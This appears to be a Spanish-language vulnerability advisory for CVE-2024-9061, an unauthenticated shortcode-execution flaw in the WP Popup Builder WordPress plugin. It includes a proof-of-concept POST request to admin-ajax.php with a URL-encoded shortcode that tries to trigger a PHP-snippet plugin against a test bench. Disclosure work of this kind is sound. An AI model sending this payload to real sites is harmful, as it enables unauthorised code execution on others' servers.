
WP Popup Builder – Popup Forms y generación de leads de marketing <= 1.3.5 - Ejecución arbitraria de shortcode sin autenticación vía wp_ajax_nopriv_shortcode_Api_Add
WP Popup Builder – Popup Forms and Marketing Lead Generation <= 1.3.5 - Ejecución arbitraria de shortcodes sin autenticación a través de wp_ajax_nopriv_shortcode_Api_Add
El complemento de WordPress WP Popup Builder – Popup Forms and Marketing Lead Generation es vulnerable a la ejecución arbitraria de shortcodes a través de la acción AJAX wp_ajax_nopriv_shortcode_Api_Add en todas las versiones hasta la 1.3.5 inclusive. Esto se debe a que el software permite a los usuarios ejecutar una acción que no valida correctamente un valor antes de ejecutar do_shortcode. Esto hace posible que atacantes no autenticados ejecuten shortcodes arbitrarios. NOTA: Esta vulnerabilidad fue parcialmente corregida en la versión 1.3.5 con una comprobación de nonce, que efectivamente impidió el acceso a la función afectada. Sin embargo, la versión 1.3.6 incorpora la verificación de autorización correcta para prevenir el acceso no autorizado.
Tenía otro complemento instalado para la ejecución de PHP para esto, pero nunca logré que se ejecutara.
[xyz-ips snippet="test"]
Type: plugin
CVSS Score: 7.3
CVE: CVE-2024-9061
Slug: wp-popup-builder
Download Link: Download [wp-popup-builder Version 1.3.2](https://downloads.wordpress.org/plugin/wp-popup-builder.1.3.2.zip)
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: wpscan-vulnerability-test-bench.ddev.site
User-Agent: curl/8.7.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
Content-Length: 107
Connection: keep-alive
action=shortcode_Api_Add&shortcode=%5b%78%79%7a%2d%69%70%73%20%73%6e%69%70%70%65%74%3d%22%74%65%73%74%22%5d
La respuesta es un 200 en blanco.